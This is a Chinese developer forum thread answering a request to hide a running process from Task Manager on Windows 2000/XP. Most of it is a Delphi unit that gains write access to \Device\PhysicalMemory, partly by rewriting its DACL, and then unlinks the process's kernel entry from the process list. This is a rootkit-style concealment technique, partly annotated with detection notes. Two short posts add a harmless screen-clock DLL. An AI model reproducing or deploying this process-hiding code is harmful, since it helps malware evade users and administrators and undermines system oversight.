怎么让运行的程序,在任务管理器中隐藏,要在98,2000,xp上都有效果。
邮箱 ahjoe&szonline.net (把&换成@)
邮箱 ahjoe&szonline.net (把&换成@)
===================================
没有代码吗?把dll发给我用用,我的mail:[email protected]
// NOTE(review): the `unit ...; interface uses` opening of this listing is not
// on the page; the line below starts in the middle of the uses clause.
// Declarations for calling two ntdll.dll exports through function pointers
// (RtlInitUnicodeString, ZwOpenSection) and the globals shared by the routines
// that follow.
Windows, SysUtils, Variants, Classes, AclAPI, accCtrl;type
NTSTATUS = LongInt;const
//NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
// Only STATUS_ACCESS_DENIED is referenced by the code visible on this page.
STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
// OBJECT_ATTRIBUTES.Attributes flag values. The visible code always passes 0,
// so none of these is used here.
OBJ_INHERIT = $00000002;
OBJ_PERMANENT = $00000010;
OBJ_EXCLUSIVE = $00000020;
OBJ_CASE_INSENSITIVE = $00000040;
OBJ_OPENIF = $00000080;
OBJ_OPENLINK = $00000100;
OBJ_KERNEL_HANDLE = $00000200;
OBJ_VALID_ATTRIBUTES = $000003F2;type
// Declared but not used by the code visible on this page.
PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
IO_STATUS_BLOCK = record
Status: NTSTATUS;
FObject: DWORD;
end; PUNICODE_STRING = ^UNICODE_STRING;
// Counted wide string; filled in by RtlInitUnicodeString in OpenPhysicalMemory.
UNICODE_STRING = record
Length: Word;
MaximumLength: Word;
Buffer: PWideChar;
end; POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
// Names the object passed to ZwOpenSection.
OBJECT_ATTRIBUTES = record
Length: DWORD;
RootDirectory: Pointer;
ObjectName: PUNICODE_STRING;
Attributes: DWORD;
SecurityDescriptor: Pointer;
SecurityQualityOfService: Pointer;
end; TZwOpenSection = function(SectionHandle: PHandle;
DesiredAccess: ACCESS_MASK;
ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
SourceString: PWideChar); stdcall;var
// Both pointers stay nil until InitNTDLL assigns them from GetProcAddress.
RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
ZwOpenSection: TZwOpenSection = nil;
// Module handle returned by LoadLibrary('ntdll.dll').
g_hNtDLL: THandle = 0;
// View returned by MapViewOfFile in OpenPhysicalMemory; LinearToPhys receives
// it as BaseAddress.
g_pMapPhysicalMemory: Pointer = nil;
// Section handle written by ZwOpenSection for \Device\PhysicalMemory.
g_hMPM: THandle = 0;
// Not referenced by the code visible on this page.
g_hMPM2: THandle = 0;
// Filled by GetVersionEx; selects the hard-coded, version-specific constants.
g_osvi: OSVERSIONINFO;
// Caches the result of YHideProcess so MyHideProcess runs it at most once
// after a success.
b_hide: Boolean = false;
//---------------------------------------------------------------------------function InitNTDLL: Boolean;
// NOTE(review): page extraction fused the `function InitNTDLL: Boolean;`
// header into the separator comment above.
// Loads ntdll.dll and stores the addresses of RtlInitUnicodeString and
// ZwOpenSection in the two global function pointers.
// Returns False only when LoadLibrary fails.
begin
g_hNtDLL := LoadLibrary('ntdll.dll'); if 0 = g_hNtDLL then
begin
Result := false;
Exit;
end; RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
// Neither GetProcAddress result is compared with nil before True is returned.
ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection'); Result := True;
end;
//---------------------------------------------------------------------------procedure CloseNTDLL;
// NOTE(review): page extraction fused the `procedure CloseNTDLL;` header into
// the separator comment above.
// Releases the ntdll.dll reference taken by InitNTDLL and clears the handle.
// The two global function pointers are left as they were.
begin
if (0 <> g_hNtDLL) then
FreeLibrary(g_hNtDLL);
g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
// NOTE(review): page extraction fused the procedure header into the separator
// comment above.
// Rewrites the DACL of the kernel object behind hSection so that it also
// grants SECTION_MAP_WRITE to the trustee named 'CURRENT_USER':
// read the current DACL, merge one GRANT_ACCESS entry into it, write it back.
//
// Defender note: this only works when hSection was opened with WRITE_DAC
// (the caller requests READ_CONTROL or WRITE_DAC). Presumably only an
// administrative token is granted that on the physical-memory section, so
// running untrusted programs without administrative rights stops the technique
// at this step -- confirm against the DACL of the OS build in question.
var
pDacl: PACL;
pSD: PPSECURITY_DESCRIPTOR;
pNewDacl: PACL;
dwRes: DWORD;
ea: EXPLICIT_ACCESS;
begin
pDacl := nil;
pSD := nil;
pNewDacl := nil; dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD); if ERROR_SUCCESS <> dwRes then
// Each of the three error branches frees buffers but does not Exit, so
// execution continues with the next API call after a failure.
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end; ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
// One explicit entry: allow mapping the section for write, not inherited.
ea.grfAccessPermissions := SECTION_MAP_WRITE;
ea.grfAccessMode := GRANT_ACCESS;
ea.grfInheritance := NO_INHERITANCE;
ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
ea.Trustee.ptstrName := 'CURRENT_USER'; dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl); if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
end; dwRes := SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil); if ERROR_SUCCESS <> dwRes then
begin
if Assigned(pSD) then
LocalFree(Hlocal(pSD^));
if Assigned(pNewDacl) then
LocalFree(HLocal(pNewDacl));
// When all three calls succeed, nothing is freed before the procedure returns.
end;end;
//---------------------------------------------------------------------------function OpenPhysicalMemory: THandle;
// NOTE(review): page extraction fused the `function OpenPhysicalMemory: THandle;`
// header into the separator comment above.
// Opens the \Device\PhysicalMemory section for read/write and maps one 4 KB
// page of it at a version-specific physical offset into this process.
// Returns the section handle (also kept in g_hMPM), or 0 on an unsupported OS
// version, a failed open, or a failed mapping.
//
// Defender note: the code accepts only OS versions 5.0 and 5.1 and returns 0
// for everything else. Later Windows releases (Windows Server 2003 SP1 onward)
// no longer allow user-mode code to open \Device\PhysicalMemory at all, so
// this path is specific to those legacy systems.
var
status: NTSTATUS;
physmemString: UNICODE_STRING;
attributes: OBJECT_ATTRIBUTES;
PhyDirectory: DWORD;
begin
g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
GetVersionEx(g_osvi); if (5 <> g_osvi.dwMajorVersion) then
begin
Result := 0;
Exit;
end; case g_osvi.dwMinorVersion of
// Hard-coded physical offsets, one per supported minor version. The mapped
// page is later indexed by LinearToPhys as a page directory, so these are
// presumably the physical address of the system page directory -- verify.
0: PhyDirectory := $30000;
1: PhyDirectory := $39000;
else
begin
Result := 0;
Exit;
end;
end; RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory'); attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
attributes.RootDirectory := nil;
attributes.ObjectName := @physmemString;
attributes.Attributes := 0;
attributes.SecurityDescriptor := nil;
attributes.SecurityQualityOfService := nil; status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes); if (status = STATUS_ACCESS_DENIED) then
// Fallback when read/write access is refused: reopen with
// READ_CONTROL or WRITE_DAC, edit the DACL, then retry the read/write open.
// The status of the open on the next line is not checked.
begin
ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM); status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
// Same test as the NT_SUCCESS macro quoted in the const section: status >= 0.
end; if not (LongInt(status) >= 0) then
begin
Result := 0;
Exit;
end; g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000); if (g_pMapPhysicalMemory = nil) then
// g_hMPM stays open when the mapping fails.
begin
Result := 0;
Exit;
end; Result := g_hMPM;
end;
//---------------------------------------------------------------------------
// NOTE(review): the routine header is missing from the page. The callers below
// invoke this body as LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)), and
// the body reads BaseAddress and addr and returns a pointer-sized value.
// Translates the virtual address addr to a physical address by reading paging
// structures through the physical-memory section. The index split
// (top 10 bits, next 10 bits, low 12 bits) and the $80 large-page test are
// consistent with 32-bit x86 two-level paging.
// Returns nil when the "present" bit (bit 0) of an entry is clear.
var
VAddr, PGDE, PTE, PAddr, tmp: DWORD;
begin
VAddr := DWORD(addr);
// PGDE := BaseAddress[VAddr shr 22];
// NOTE(review): extraction fused `if 0 = (PGDE and 1) then` into the trailing
// comment of the next line; it evidently guards the nil return that follows.
PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // Modify by dot. if 0 = (PGDE and 1) then
begin
Result := nil;
Exit;
end; tmp := PGDE and $00000080; if (0 <> tmp) then
// Bit $80 set: the directory entry maps a large page directly, so the low
// 22 bits of the virtual address are the offset inside it.
begin
PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);
end
else
begin
// Map the page the directory entry points to. 4 is the numeric value of
// FILE_MAP_READ. The result is not checked for nil before it is read.
PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
// PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];
// NOTE(review): the `if (0 = (PTE and 1)) then` guard is likewise fused into
// the trailing comment of the next line. The Exit it guards comes before
// UnmapViewOfFile, so that view stays mapped on the not-present path.
PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // Modify by dot. if (0 = (PTE and 1)) then
begin
Result := nil;
Exit;
end; PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);
UnmapViewOfFile(Pointer(PGDE));
end; Result := Pointer(PAddr);
end;
//---------------------------------------------------------------------------function GetData(addr: Pointer): DWORD;
// NOTE(review): page extraction fused the `function GetData(addr: Pointer): DWORD;`
// header into the separator comment above.
// Reads one DWORD at virtual address addr: translate it with LinearToPhys,
// map the 4 KB physical page that contains it, read, unmap.
// Returns 0 when the page cannot be mapped. A nil result from LinearToPhys is
// not distinguished: it becomes physical address 0.
var
phys, ret: DWORD;
tmp: PDWORD;
begin
phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
phys and $FFFFF000, $1000)); if (nil = tmp) then
begin
Result := 0;
Exit;
end;// ret := tmp[(phys and $FFF) shr 2];
// (phys and $FFF) shr 2 is used as a DWORD index inside the page, so the two
// low address bits are dropped and the read is DWORD-aligned.
ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // Modify by dot.
UnmapViewOfFile(tmp); Result := ret;
end;
//---------------------------------------------------------------------------function SetData(addr: Pointer; data: DWORD): Boolean;
// NOTE(review): page extraction fused the function header into the separator
// comment above.
// Writes one DWORD to virtual address addr through the physical-memory
// section: translate with LinearToPhys, map the containing 4 KB page for
// write, store, unmap. Returns False when the page cannot be mapped.
//
// Defender note: this is a user-mode write to arbitrary physical memory. It
// depends entirely on the section handle opened in OpenPhysicalMemory, so it
// is blocked where that open is refused.
var
phys: DWORD;
tmp: PDWORD;
begin
phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000)); if (nil = tmp) then
begin
Result := false;
Exit;
end;// tmp[(phys and $FFF) shr 2] := data;
// Same DWORD-aligned indexing as GetData.
PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // Modify by dot.
UnmapViewOfFile(tmp); Result := TRUE;
end;
//---------------------------------------------------------------------------
{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
begin
ExitProcess(0);
return 1 ;
end }
//---------------------------------------------------------------------------function YHideProcess: Boolean;
// NOTE(review): page extraction fused the `function YHideProcess: Boolean;`
// header into the separator comment above.
// Reads a pointer at the fixed address $FFDFF124 (labelled kteb), follows
// offset $44 from it (labelled kpeb), reads two link fields from that
// structure, and rewrites the two neighbouring entries so they point at each
// other. This unlinks the structure from a doubly linked list. The offsets
// ($A0/$A4 for minor version 0, $88/$8C for minor version 1) are hard-coded
// per OS version; presumably the list is the kernel's active-process list for
// the calling process -- the page does not say so explicitly.
//
// Defender note: removing an entry from that list affects only enumerators
// that walk the list. The entry's threads, handles and memory are untouched,
// so cross-view checks still find the process: compare the list walk with an
// independent source such as thread or handle tables, or with pool scanning
// of a memory image (for example Volatility's psscan / psxview against
// pslist). A process that appears in one view but not the other is the
// indicator to alert on.
var
thread, process: DWORD;
fw, bw: DWORD;
begin
// SetUnhandledExceptionFilter(exeception);
if (FALSE = InitNTDLL) then
begin
Result := FALSE;
Exit;
end; if (0 = OpenPhysicalMemory) then
// This early exit skips the CloseNTDLL call at the end of the routine.
begin
Result := FALSE;
Exit;
end; thread := GetData(Pointer($FFDFF124)); //kteb
// NOTE(review): extraction fused `if (0 = g_osvi.dwMinorVersion) then` into
// the trailing comment of the next line.
process := GetData(Pointer(thread + $44)); //kpeb if (0 = g_osvi.dwMinorVersion) then
begin
// fw / bw: forward and backward link values read from the structure.
fw := GetData(Pointer(process + $A0));
bw := GetData(Pointer(process + $A4)); SetData(Pointer(fw + 4), bw);
SetData(Pointer(bw), fw); Result := TRUE;
end
else if (1 = g_osvi.dwMinorVersion) then
begin
fw := GetData(Pointer(process + $88));
bw := GetData(Pointer(process + $8C)); SetData(Pointer(fw + 4), bw);
SetData(Pointer(bw), fw); Result := TRUE;
end
else
begin
Result := False;
// The GetData / SetData results are not checked; Result is TRUE for both
// supported versions whatever those calls returned.
end; CloseHandle(g_hMPM);
CloseNTDLL;
// MyHideProcess: calls YHideProcess until it has succeeded once, then returns
// the cached flag b_hide without repeating the operation.
end;function MyHideProcess: Boolean;
begin
if not b_hide then
begin
b_hide := YHideProcess;
end; Result := b_hide;
end;end.
你给的那个,我测试过,在xp下也不行
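unit UnitDll;

{ Starts a background thread when the unit is initialised. The thread draws the
  current local time in the top-left corner of the screen about ten times per
  second until the unit is finalised.

  NOTE: when this unit is compiled into a DLL, the initialization section runs
  from the DLL entry point, so the thread is started inside every process that
  loads the DLL. }

interface

uses
  SysUtils,
  Classes,
  Windows,
  Dialogs;

var
  hThreadHandle: Dword; // handle of the painter thread; 0 if CreateThread failed
  dwThreadID: Dword;    // thread id filled in by CreateThread

implementation

{ Thread entry point: shows the time in the top-left corner of the screen.
  Declared with the signature CreateThread expects (stdcall, one pointer
  argument, DWORD result); the original parameterless register-convention
  procedure only worked because it never returns.
  Parameter is unused. The loop never ends; the thread is stopped from the
  finalization section. }
function ThreadProc(Parameter: Pointer): DWORD; stdcall;
var
  ScreenDC: HDC;
  Stamp: _SYSTEMTIME;
  Caption: string;
begin
  Result := 0;
  while True do
  begin
    Sleep(100);
    ScreenDC := GetDC(0);
    // GetDC returns 0 on failure; skip this tick instead of drawing on it.
    if ScreenDC = 0 then
      Continue;
    GetLocalTime(Stamp);
    Caption := Format('Current Time is %d-%d-%d %d:%d:%d',
      [Stamp.wYear, Stamp.wMonth, Stamp.wDay,
       Stamp.wHour, Stamp.wMinute, Stamp.wSecond]);
    TextOut(ScreenDC, 0, 0, PChar(Caption), Length(Caption));
    ReleaseDC(0, ScreenDC);
  end;
end;

initialization
  // The thread is created with CreateThread rather than BeginThread, so the
  // RTL is not told that a second thread exists. Set the flag by hand so the
  // memory manager locks around the string allocations made by Format.
  IsMultiThread := True;
  hThreadHandle := CreateThread(nil, 0, @ThreadProc, nil, 0, dwThreadID);

finalization
  if hThreadHandle <> 0 then
  begin
    // TerminateThread stops the thread without any cleanup; if it lands
    // between GetDC and ReleaseDC, that device context is not released.
    TerminateThread(hThreadHandle, 0);
    // The original never closed the thread handle.
    CloseHandle(hThreadHandle);
    hThreadHandle := 0;
  end;

end.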
做成dll
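unit UnitDll;

{ Second posting of the same unit. On load it starts a thread that keeps
  painting the current local time at screen position (0, 0).

  NOTE: built into a DLL, the initialization section below runs from the DLL
  entry point, i.e. in whichever process loads the DLL. }

interface

uses
  SysUtils,
  Classes,
  Windows,
  Dialogs;

var
  hThreadHandle: Dword; // painter thread handle, 0 when creation failed
  dwThreadID: Dword;    // id reported by CreateThread

implementation

{ Shows the time in the top-left corner of the screen.
  Uses the calling convention and signature CreateThread requires; the
  posted version was a plain parameterless procedure. Parameter is ignored
  and the function does not return while the thread is alive. }
function ThreadProc(Parameter: Pointer): DWORD; stdcall;
var
  DesktopDC: HDC;
  LocalNow: _SYSTEMTIME;
  Line: string;
begin
  Result := 0;
  repeat
    Sleep(100);
    DesktopDC := GetDC(0);
    if DesktopDC <> 0 then
    begin
      GetLocalTime(LocalNow);
      // The format string keeps the trailing space of the posted code.
      Line := Format('Current Time is %d-%d-%d %d:%d:%d ',
        [LocalNow.wYear, LocalNow.wMonth, LocalNow.wDay,
         LocalNow.wHour, LocalNow.wMinute, LocalNow.wSecond]);
      TextOut(DesktopDC, 0, 0, PChar(Line), Length(Line));
      ReleaseDC(0, DesktopDC);
    end;
  until False;
end;

initialization
  // CreateThread bypasses BeginThread, so mark the process as multi-threaded
  // for the RTL memory manager before the worker starts allocating strings.
  IsMultiThread := True;
  hThreadHandle := CreateThread(nil, 0, @ThreadProc, nil, 0, dwThreadID);

finalization
  // The posted text had `< >` here, which is not a valid operator; the
  // intended comparison is `<>`.
  if hThreadHandle <> 0 then
  begin
    // Forced termination: the thread gets no chance to release a DC it holds.
    TerminateThread(hThreadHandle, 0);
    CloseHandle(hThreadHandle); // release the handle the original leaked
    hThreadHandle := 0;
  end;

end.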
做成dll
=================================没有看懂怎么用,你发个demo给我如何:[email protected]